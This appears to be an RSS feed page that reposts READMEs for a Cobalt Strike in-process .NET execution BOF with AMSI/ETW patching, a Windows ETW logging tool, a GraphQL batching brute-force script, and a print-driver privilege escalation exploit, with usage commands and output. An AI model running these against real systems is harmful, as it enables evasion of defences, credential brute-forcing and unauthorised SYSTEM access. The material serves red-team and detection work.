RSS Security

πŸ”’
❌ About FreshRSS
There are new articles available, click to refresh the page.
Yesterday β€” 19 September 2021Tools

InlineExecute-Assembly - A PoC Beacon Object File (BOF) That Allows Security Professionals To Perform In Process .NET Assembly Execution

19 September 2021 at 20:30
By: Zion3R


InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of Main(string[] args) or Main(). This should allow you to run most released tooling without any prior modification needed.

The BOF will automatically determine which Common Language Runtime (CLR) is needed to be loaded into the process for your assembly (v2.0.50727 or v4.0.30319) prior to execution and in most cases, should exist gracefully if any issues arise. The BOF also supports several flags which allow the operator to dictate several behaviors prior to .NET execution which include, disabling AMSI via in memory patching, disabling and restoring ETW via in memory patching, customization of the CLR App Domain name to be created, whether to create and direct console output of your assembly to a named pipe or mailslot, and allows the operator to switch the default entry point of Main(string[] args) to Main(). More details on usage, use cases, and possible detections can be found below and https://sec urityintelligence.com/posts/net-execution-inlineexecute-assembly/.

Lastly the advantage of executing our .NET assemblies in the same process as our beacon implant is that we avoid the default behavior of Cobalt Strike's execute-assembly module which creates a new process to then load/inject the CLR/.NET assembly. However, other opsec considerations still exist, for example, does the process we are executing within normally load the CLR or does the .NET assembly we are executing have any known signatures? Therefore, the disadvantage is that if something does get detected and killed, for example by AMSI, your beacon is also killed.


Subject References

This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added.

  • HostingCLR - here - CLR/Executing assembly logic
  • Dotnet-Loader-Shellcode - (by @modexpblog) - here - All around great research including on COM Interfaces for executing .NET in C -> Real MVP
  • Donut - (by @TheRealWover and @modexpblog) - here - COM Interfaces Header
  • Memory Patching AMSI Bypass - (by @_RastaMouse) - here - AMSI memory patching research
  • Metasploit-Execute-Assembly - (by @b4rtik) - here - Modified AMSI patching and used find .NET version function
  • ExecuteAssembly - (by @med0x2e)- here - Modified aggressor script
  • Hiding Your .NET ETW - (by @xpn) - here - Great ETW research
  • ETW BOF - (by @ajpc500)- here - Modified ETW patching
  • ExecuteAssembly_Mailslot - (by @N4k3dTurtl3)- here - Modified using mailslots for console redirection
  • @freefirex2 - Was kind enough to share some good BOF inner workings and gotcha's.

Getting Started
  1. Copy the inlineExecute-Assembly folder with all of its contents to a system you plan to connect with via the Cobalt Strike GUI application.
  2. Load in the inlineExecute-Assembly.cna Aggressor script
  3. Run inlineExecute-Assembly --dotnetassembly /path/to/assembly.exe for most basic execution (see use cases below for specific flag examples)

Build Your Own

Run the below command inside the src directory via x64 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx64.o

Run the below command inside the src directory via x86 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx86.o

Flags
--dotnetassembly        Directory path to your assembly **required**
--assemblyargs Assembly arguments to pass
--appdomain Change default name of AppDomain sent (default value is totesLegit and is set via the included aggressor script) *Domain always unloaded*
--amsi Attempts to disable AMSI via in memory patching (If successful AMSI will be disabled for the entire life of process)
--etw Attempts to disable ETW via in memory patching (If successful ETW will be disabled for the entire life of process unless reverted)
--revertetw Attempts to disable ETW via in memory patching and then repatches it back to original state
--pipe Change default name of named pipe (default value is totesLegit and is set via the included aggressor script)
--mailslot Switches to using mailslots to redirect console output. Changes default name of mailslot (If left blank, d efault value is totesLegit and is set via the included aggressor script)
--main Changes entry point to Main() (default value is Main(string[] args))


Use Case

Execute .NET assembly


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe

Use Case

Execute .NET assembly with arguments


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker

Use Case

Execute .NET assembly with arguments and disable AMSI


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi

Use Case

Execute .NET assembly with arguments and disable ETW


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw

Use Case

Execute .NET assembly with arguments and redirect output via mailslots instead of the default named pipe


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --mailslot

Use Case

Execute .NET assembly with arguments and change the default named pipe name set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --pipe forRealLegit

Use Case

Execute .NET assembly and change the default app domain set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --appdomain forRealLegit

Use Case

Execute .NET assembly with Main() entry point instead of the default Main(string[] args)


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/simpleMain.exe --main

Use Case

Go HAM


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi --etw --appdomain forRealLegit --mailslot forRealLegit

Caveats
  1. While I have tried to make this as stable as possible, there are no guarantees things will never crash and beacons won’t die. We don’t have the added luxury of fork and run where if something goes wrong our beacon lives. This is the tradeoff with BOFs. With that said, I can’t stress how important it is that you test your assemblies beforehand to make sure they will work properly with the tool.
  2. Since the BOF is executed in process and takes over the beacon while running, this should be taken into account before being used for long running assemblies. If you choose to run something that will take a long time to get back results, your beacon will not be active to run more commands till the results come back and your assembly finishes running. This also doesn’t adhere to sleep set. For example, if your sleep is set at 10 minutes and you run the BOF, you will get results back as soon as the BOF finishes executing.
  3. Unless modification is done to tools that load PE’s in memory (e.g., SafetyKatz), these will most likely kill your beacon. Many of these tools work fine with execute assembly because they are able to send their console output from the sacrificial process before exiting. When they exit via our in process BOF, they kill our process, which kills our beacon. These can be modified to work but I would advise running these types of assemblies via execute assembly since other non-OPSEC friendly things could be loaded into your process that don’t get removed.
  4. If your assembly uses Environment.Exit this will need to be removed as it will kill the process and beacon.
  5. Named pipes and mail slots need to be unique. If you don’t receive data back and your beacon is still alive, the issue is most likely you need to select a different named pipe or mail slot name.

Detection

Some detection and mitigation strategies that could be used:

  1. Uses PAGE_EXECUTE_READWRITE when performing AMSI and ETW memory patching. This was done on purpose and should be a red flag as very few programs have memory ranges with the memory protection of PAGE_EXECUTE_READWRITE.
  2. Default name of named pipe created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  3. Default name of mailslot created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  4. Default name of AppDomain loaded is totesLegit. This was done on purpose and signature detections could be used to flag this.
  5. Good tips on detecting malicious use of .NET (by @bohops) here, (by F-Secure) here, and here
  6. Looking for .NET CLR loading into suspicious processes, such as unmanaged processes which should never have the CLR loaded.
  7. Event Tracing here
  8. Looking for other known Cobalt Strike Beacon IOC's or C2 egress/communication IOC's.


QLOG - Windows Security Logging

19 September 2021 at 11:30
By: Zion3R


QLOG provides enriched Event Logging for security related events on Windows based systems. It is under heavy development and currently in alpha state. QLOG doesn’t use API hooks and it doesn’t require a driver to be installed on the target system, QLOG only uses ETW to retrieve its telemetry. Currently QLOG supports β€œprocess create” events only, but other enriched events will follow soon. QLOG runs as a Windows Services, but can also run in console mode, if you want to stream the enriched events to console directly.


How does it work

QLOG reads from ETW, enriches events and writes enriched events to Event Channel β€œQLOG”. It creates and uses a new event source named β€œQMonitor” to write to Windows Eventlog.

Here is sequence of event processing:

  • Create ETW session & Subscribe to relevant kernel and userland ETW providers
  • Read Events from ETW providers
  • Enrich Events
  • Write enriched events to eventlog channel QLOG

Development & License

QLOG is being developed by threathunters.io community and will be open sourced once it reaches production grade maturity.


Why we created QLOG?

Sysmon does a great job, but we wanted to create a tool which is open source and doesn't require drivers to be installed on target systems. Also, Sysmon is NOT SUPPORTED by Microsoft at all. So, if you run into problems in prod, you're at your own. Sure, QLOG doesn't have support either, but it will be open sourced so we can fix issues with the power of the security community and develop new features based on the requirements of the community.


Usage & install

QLOG requires .NET Framework >=4.7.2 to be installed.

To run in interactive console mode, just run

qlog.exe

To install / deinstall as Windows service, run:

#install service
qlog.exe -i

#deinstall service
qlog.exe -u

Do you want to contribute?

Please see https://threathunters.io/ on how to join threathunters.io community.


Example output of enriched PROCESS CREATE events
{
"EventGuid": "68795fe8-67e7-410b-a5c0-8364746d7ffe",
"StartTime": "2021-07-11T11:06:56.9621746+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TESTOS\\TESTUSER",
"Imagefilename": "TEAMS.EXE",
"KernelImagefilename": "TEAMS.EXE",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 21740,
"Commandline": "\"C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe\" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1668,499009601563875864,12511830007210419647,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=de --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=\"C:\\Users \\jocke",
"Modulecount": 41,
"TTPHash": "42AC63285408F5FD91668B16F8E9157FD97046AB63E84117A14E31A188DDC62F",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "None",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B 4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02. 12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": {
"EventGuid": null,
"StartTime": "2021-07-11T09:54:28.9558001+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TEST- OS\\TESTUSER",
"Imagefilename": "",
"KernelImagefilename": "",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 16232,
"Commandline": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe ",
"Modulecount": 162,
"TTPHash": "",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "Medium",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=W ashington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02.12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": null
}
}


Before yesterdayTools

BatchQL - GraphQL Security Auditing Script With A Focus On Performing Batch GraphQL Queries And Mutations

18 September 2021 at 20:30
By: Zion3R


BatchQL is a GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.

When exploring the problem space of GraphQL batching attacks, we found that there were a few blog posts on the internet, however no tool to perform GraphQL batching attacks.

GraphQL batching attacks can be quite serious depending on the functionalities implemented. For example, imagine a password reset functionality which expects a 4 digit pin that was sent to your email. With this tool, you could attempt all 10k pin attempts in a single GraphQL query. This may bypass any rate limiting or account lockouts depending on the implementation details of the password reset flow.


Detections

This tool is capable of detecting the following:

  • Introspection query support
  • Schema suggestions detection
  • Potential CSRF detection
  • Query name based batching
  • Query JSON list based batching

Attacks

Currently, this tool only supports sending JSON list based queries for batching attacks. It supports scenarios where the variables are embedded in the query, or where they are provided in the JSON input.


Usage

Enumeration
❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080

Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyance
CSRF GET based successful. Please confirm that this is a valid issue.
CSRF POST based successful. Please confirm that this is a valid issue.
Query name based batching: GraphQL batching is possible... preflight request was successful.
Query JSON list based batching: GraphQL batching is possible... preflight request was successful.
Most provide query, wordlist, and size to perform batching attack.

Batching Attacks
  1. Save a file that contains your GraphQL query i.e. acc-login.txt:
mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
emailLoginRemembered(loginInput: $loginInput) {
authToken {
accessToken
__typename
}
userSessionResponse {
userToken
userIdentity {
userId
identityType
verified
onboardingStatus
registrationReferralCode
userReferralInfo {
referralCode {
code
valid
__typename
}
__typename
}
__typename
}
__typename
}
__typename
}
}
  1. Run the following command to run a GraphQL batching attack:
❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080

The above command does the following:

  • Specifies a query from a local file --query acc-login.txt.
  • Specifies a wordlist --wordlist passwords.txt
  • Specifies the variable input with the replacement identifier -v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}
  • Specifies the batch size --size 100
  • Specifies the endpoint -e http://re.local:5000/graphiql
  • Specifies a proxy -p localhost:8080

References


Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool

18 September 2021 at 11:30
By: Zion3R


Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the as designed package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.


What exploits are available

Concealed Position offers four exploits - all with equally dumb names:

The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.


But which exploit should I use?!

Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL) and SLASHINGDAMAGE damage, hopefully, is patched most everywhere.


How does it work?

Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:

Step 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver

Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage

Stage 3: Add a local printer (exploitation stage)
client: Add printer

It is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.


Is this a Windows vulnerability?

Arguably, yes. The driver store is a "trusted collection of ... third-party driver packages" that requires administrator access to modify. Using GetPrinterDriver a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.

Microsoft seemed to agree when they issued CVE-2021-34481.

Although... it's arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.


Which verions of Windows are affected by CVE-2021-34481?

At least Windows 8.1 and above.


How do I use these tools?

Simple! So simple there will be many paragraphs to describe it!


CP Server

First, let's look at cp_server's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

CLI options:
-h, --help Display the help message
-e, --exploit arg The exploit to use
-c, --cabs arg (=.\cab_files) The location of the cabinet files

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE
SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Above you can see the server requires two options:

  1. The exploit to configure the printer for
  2. A path to this repositories cab_files (.\cab_files\ is the default)

For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

And that's it, you'll see a new printer on your system:

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name ComputerName Type DriverName PortName Shared Publishe
d
---- ------------ ---- ---------- -------- ------ --------
ACIDDAMAGE Local Lexmark Universal v2 LPT1: True False
CutePDF Writer Local CutePDF Writer v4.0 CPW4: False False
OneNote for Windows 10 Local Microsoft Software Pri... Microsoft.Of... False False
Microsoft XPS Document Writer Local Microsoft XPS Document... PORTPROMPT: False False
Microsoft Print to PDF Local Microsoft Print To PDF PORTPROMPT: False False
Fax Local Microsoft Shared Fax D... SHRFAX: False False


PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Note that there is one manual step that cp_server prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!

The process for using SLASHINGDAMAGE is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and then you'll still need to follow a couple of manual steps and reboot.


CP Client

The client is similarly easy to use. Let's look at it's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

CLI options:
-h, --help Display the help message
-r, --rhost arg The remote evil printer address
-n, --name arg The remote evil printer name
-e, --exploit arg The exploit to use
-l, --local No remote printer. Local attack only.
-d, --dll arg Path to user provided DLL to execute.

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE

First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.

cp_client has two modes: remote and local. The remote option is the most interesting because it adds the vulnerable driver to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:

  1. The exploit I want to use
  2. The evil printer IP address
  3. The name of the evil shared printer

Like this!

C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_ | ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

That's it! To execute a local only attack, you just need to provide the exploit:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| ||_____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| client!

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Why doesn't the client have a SLASHINGDAMAGE option?

SLASHINGDAMAGE doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:

echo β€œevil.dll” β€œ../../evil.dll” > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab

It's probably important to know that the version of SLASHINGDAMAGE in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.


Pull Requests and Bugs

Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.


Other things

One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).



❌